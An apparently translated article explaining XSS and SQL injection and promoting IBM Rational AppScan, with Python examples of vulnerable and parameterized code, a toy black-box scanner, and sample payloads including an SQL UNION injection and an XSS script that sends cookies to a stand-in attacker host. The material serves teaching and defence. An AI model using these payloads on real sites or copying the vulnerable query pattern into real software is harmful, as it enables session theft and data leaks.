Testing applications is always hard: time, people and tooling all turn into tasks that have to be solved before the first test runs. Testing for vulnerability to attacks is harder still, because not everyone knows what the attackers actually use. To address this problem, IBM created Rational AppScan, a program that automatically scans web applications for vulnerabilities and generates reports on the test results.
Curious statistics.
Like everything else, hacking activity is studied and counted, and the figures sometimes differ from what is assumed in professional circles. Gartner, for example, estimated that 75% of all attacks target web applications, and that two thirds of all applications are vulnerable. In practice this means that if you have no security specialist of your own, you will be hacked whenever an attacker chooses to, even if you run a firewall and check it regularly. The most popular attack methods turned out to be XSS and SQL injection, against which server-level protection is useless: the attack happens at the application level, inside requests that the firewall considers perfectly legitimate. People have learned to protect the server and spend money on it, but not the application, and that is where the 75% comes from. On top of that, security testing is done at the end of a project, usually on the "residual principle" with whatever time is left, which also affects the result.
As it happens
Consider the two most popular techniques: XSS and SQL injection.
The essence of XSS (cross-site scripting) is to get the victim's browser to run attacker-supplied JavaScript in the context of a site the victim trusts, for example by placing it in the address bar. An attacker could send an e-mail built on the corporate template of the bank the victim uses: some of the words are highlighted as links, and the user is unlikely to notice what follows the domain name in the address, if he looks at the address at all.
That JavaScript then gets access to the security context of the site, because it is executed inside the site's own pages: from the browser's point of view it is the site's own script. This means it can steal cookies, track everything the user does in the browser from the moment the script runs, redirect the user to a fraudulent site, or completely modify the content of the pages being viewed.
Not surprisingly, this is the most popular technique to date, but SQL injection is not far behind. As the name suggests, it works by sending SQL commands along with the data the user enters. Very often a programmer, through laziness or ignorance, does not check the submitted data and inserts it straight into the generated SQL query exactly as it arrived. If an attacker puts SQL commands there, they are executed, because they go straight into the query that a poorly written program builds automatically.
The simplest example: a user clicks a link to a product, and the product's numeric ID is in the address bar. The script on the site substitutes that ID into a query template straight from the address bar and executes it. SQL is an open, widely used language, and it is easy to guess that the template looks something like SELECT * FROM products WHERE id = '...', with the number from the address bar in place of the ellipsis. It is enough to start the value with an apostrophe, which closes the quoted literal early, and then write your own SQL after it: everything that follows is no longer data but part of the query. The trick is simple, but popular.
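To make both techniques concrete, here is an added example in Python (mine, not code from the article or from IBM): a product lookup written the way the text describes, with the ID pasted into the query template, next to a parameterized version; and a search page that reflects its query into HTML unescaped next to one that escapes it. The product table, the secret column, the attacker.example host and all payloads are constructed for the example.

```python
import html
import sqlite3


def make_db():
    """Constructed in-memory product table standing in for the shop's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, name TEXT, secret TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)",
                   [(1, "Keyboard", "cost-price 12"), (2, "Mouse", "cost-price 4")])
    return db


# --- SQL injection: the query template from the text ---------------------

def product_by_id_vulnerable(db, id_from_url):
    # The value from the address bar is pasted into the query text as-is.
    query = f"SELECT id, name FROM products WHERE id = '{id_from_url}'"
    return db.execute(query).fetchall()


def product_by_id_safe(db, id_from_url):
    # The SQL text is fixed; the value travels separately as a bound parameter,
    # so an apostrophe inside it can never close the literal.
    query = "SELECT id, name FROM products WHERE id = ?"
    return db.execute(query, (id_from_url,)).fetchall()


# Constructed attacker inputs: the apostrophe closes the '...' literal early and
# the rest becomes SQL; "--" comments out the template's trailing quote.
OR_PAYLOAD = "1' OR '1'='1"
UNION_PAYLOAD = "1' UNION SELECT id, secret FROM products --"


# --- XSS: a search page that reflects its query ---------------------------

XSS_PAYLOAD = ("<script>document.location='https://attacker.example/?c='"
               "+document.cookie</script>")   # constructed cookie-stealing payload


def search_page_vulnerable(q):
    # The query string lands in the HTML unchanged, so '<script>' becomes markup.
    return f"<h1>Results for {q}</h1>"


def search_page_safe(q):
    # Escaping turns < > & " ' into entities; the browser shows text, never runs it.
    return f"<h1>Results for {html.escape(q, quote=True)}</h1>"


if __name__ == "__main__":
    db = make_db()
    print(product_by_id_vulnerable(db, OR_PAYLOAD))     # every product, not just id 1
    print(product_by_id_vulnerable(db, UNION_PAYLOAD))  # the secret column leaks too
    print(product_by_id_safe(db, OR_PAYLOAD))           # []: treated as a literal string
    print(search_page_vulnerable(XSS_PAYLOAD))
    print(search_page_safe(XSS_PAYLOAD))
```

Run with a real SQLite database, the vulnerable lookup returns every row for the OR payload and the secret column for the UNION payload, while the parameterized lookup returns nothing for either: the database never sees the attacker's text as SQL. The same holds for the search page, where one call to html.escape is the whole difference between markup and text.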
How does IBM Rational AppScan handle this?
IBM Rational AppScan treats the application as a "black box". First it explores the web application by crawling it and builds its own model of the site. From that model it derives attack vectors according to the selected testing policy. It then sends HTTP requests that match the policy and analyzes the HTTP responses for signs of a vulnerability.
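To show what those stages look like in code, here is an added example written for this page, not taken from AppScan: a toy black-box scanner in Python. It crawls a constructed stand-in application (mock_app, an in-process function that returns HTML for a path plus query string, so nothing leaves the machine), builds a site model of paths and their parameters, derives one attack vector per parameter from a two-check policy, sends the probes and reads the replies. The mock application, the reflection marker and the error regex are assumptions made for the example.

```python
import re
import sqlite3
from collections import deque
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed stand-in for the target application. The scanner only ever sees
# request strings and response bodies, exactly as it would over HTTP.
_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE products (id INTEGER, name TEXT)")
_db.execute("INSERT INTO products VALUES (1, 'Keyboard')")


def mock_app(url):
    """Return the HTML body for a path-plus-query string such as '/item?id=1'."""
    parts = urlsplit(url)
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if parts.path == "/":
        return ('<a href="/search?q=shoes">Search</a> '
                '<a href="/item?id=1">Item</a> <a href="/about">About</a>')
    if parts.path == "/search":            # reflects q without escaping (XSS)
        return f"<h1>Results for {params.get('q', '')}</h1>"
    if parts.path == "/item":              # concatenates id into SQL (SQLi)
        try:
            row = _db.execute(
                f"SELECT name FROM products WHERE id = '{params.get('id', '')}'").fetchone()
            return f"<p>{row[0] if row else 'not found'}</p>"
        except sqlite3.Error as e:
            return f"<p>Database error: {e}</p>"   # error text leaks to the client
    return "<p>About us</p>"


HREF = re.compile(r'href="([^"]+)"')


def crawl(send, start="/"):
    """Stage 1: explore the application and build a site model {path: {param, ...}}."""
    model, queue, seen = {}, deque([start]), set()
    while queue:
        url = queue.popleft()
        if url in seen:
            continue
        seen.add(url)
        parts = urlsplit(url)
        model.setdefault(parts.path, set()).update(parse_qs(parts.query).keys())
        for link in HREF.findall(send(url)):
            if link.startswith("/"):       # stay on the same host
                queue.append(link)
    return model


# Stage 2: the testing policy. Each check is a payload plus a way to read the
# response. The marker and the error pattern are constructed for this example.
XSS_MARKER = "<xss-probe-7f3a>"
SQL_ERROR = re.compile(r'unrecognized token|syntax error|incomplete input|near "', re.I)
POLICY = {
    "reflected-xss": (XSS_MARKER, lambda body: XSS_MARKER in body),
    "sql-error":     ("'",        lambda body: bool(SQL_ERROR.search(body))),
}


def scan(send, start="/"):
    """Stages 3-4: one request per (path, parameter, check); analyze each reply."""
    findings = []
    for path, params in crawl(send, start).items():
        for param in sorted(params):
            for name, (payload, detect) in POLICY.items():
                body = send(f"{path}?{urlencode({param: payload})}")
                if detect(body):
                    findings.append((name, path, param))
    return findings


if __name__ == "__main__":
    for finding in scan(mock_app):
        print("%-14s %s?%s" % finding)
```

Two caveats a practitioner would attach to this: the SQL check only catches error-based injection (an application that swallows the database error passes it, which is why real scanners add blind and differential checks), and the reflection check only proves the marker came back unescaped, not that a browser would execute it in that HTML context. Both are exactly the gaps a commercial scanner's larger policy exists to close.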

What do we get as a result? A powerful and understandable tool that automatically scans and tests web applications, including web services and JavaScript, for typical vulnerabilities, and helps fix them (giving a list of actions to close each detected vulnerability where it cannot be fixed automatically). IBM Rational AppScan integrates with other testing tools and can exchange test data and reports with them. In total it ships with more than 40 ready-made reports for compliance with security requirements.

A very important feature of IBM Rational AppScan is that it does not require expensive security specialists on the team, because it provides very detailed reports and instructions. Each vulnerability comes with an accessible description of how it works and why it is dangerous, including video clips. In other words, the IBM team took the educational component seriously.
And one can understand them: the higher the average computer literacy, the fewer problems we IT workers have. Knowledge is the most effective way to protect information. It is not for nothing that the product is called Rational.